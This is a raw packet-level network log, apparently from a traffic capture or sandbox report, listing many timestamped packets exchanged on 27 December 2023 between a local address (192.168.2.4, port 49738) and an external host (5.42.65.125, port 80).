Dec 27, 2023 17:57:26.374260902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374274969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374286890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374289989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374311924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374326944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374392986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374406099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374418020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374444962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374460936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374475956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374500036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374516964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374533892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374560118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374588966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374602079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374614954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374628067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374628067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374641895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374655008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374686956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374702930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374716997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374753952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374800920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374845982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374859095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374870062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374882936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374896049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374897003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374911070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374910116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374927998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374939919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.374943972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.374972105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375185013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375199080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375241041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375247955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375293970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375330925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375344992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375355959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375370026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375380993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375384092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375401020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375407934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375415087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375441074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375443935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375483036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375485897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375528097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375638962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375653028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375663996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375678062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375691891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375693083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375710964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375716925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375726938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375741959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375772953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375796080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375834942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375849009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375860929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375874996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375886917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375889063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375901937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.375917912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.375952005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376717091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376739025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376753092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376764059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376776934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376791000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376791954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376805067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376820087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376821995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376835108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376841068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376848936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376862049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376864910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376876116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376888037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376889944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376916885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376929045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376931906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376945019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376952887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376960039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376974106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.376980066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.376987934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377000093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377012014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377021074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377028942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377039909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377043962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377068996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377145052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377159119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377171040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377187014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377222061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377235889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377250910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377315044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377345085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377360106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377377033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377379894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377391100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377393007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377408981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377415895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377435923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377453089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377475977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377485037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377491951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377506018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377506971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377521992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377536058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377536058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377548933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377562046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377566099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377594948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377616882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377630949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377643108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377666950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377676010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377712965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377727985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377748013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377763033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.377772093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377790928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.377954006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378104925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378144979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378268957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378283024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378308058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378309011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378324032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378348112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378348112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378427982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378441095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378453016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378465891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378472090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378479958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378494024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378496885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378506899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378509998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378537893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378628969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378643036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378680944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378747940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378762007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378787041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378793001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378803015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378817081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378829002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378833055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378855944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378859997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378887892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378902912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378904104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378916979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378942966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.378983021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.378997087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379026890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379120111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379133940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379146099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379159927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379164934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379173994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379187107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379194021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379201889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379214048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379219055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379228115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379240990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379252911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379254103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379266977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379280090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379285097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379292965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379302025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379307985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379322052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379327059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379336119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379352093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379353046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379367113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379380941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379385948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379396915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379398108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379411936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379445076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379664898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379679918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379714012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379744053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379757881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379801035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379812002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379847050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379863024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379878044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379904985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.379945993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379960060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.379992962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.380012035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380026102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380074024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.380145073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380157948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380170107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380183935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380192041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.380198002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380212069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380224943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380238056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380243063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.380250931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380264044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380264997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.380278111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.380285978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.380312920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.433150053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.463046074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476133108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476151943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476161003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476169109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476178885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476186991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476203918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476212978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476223946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476226091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476272106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476279974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476290941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476299047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476334095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476411104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476445913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476455927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476464987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476494074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476511955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476543903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476552963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476561069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476567984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476584911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476592064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476593018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476600885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476623058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476625919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476635933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476649046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476684093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476712942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476731062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476739883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476747990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476757050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476782084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476819992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476828098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476835012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476844072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476871014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.476910114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.476988077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477003098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477010012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477040052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477041006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477060080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477073908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477082968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477112055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477248907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477257967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477271080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477277994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477286100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477294922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477302074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477308035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477308989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477324009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477332115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477339983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477344036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477349997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477349997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477360964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477369070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477375984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477376938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477391958 CET	49738	80	192.168.2.4	5.42.65.125
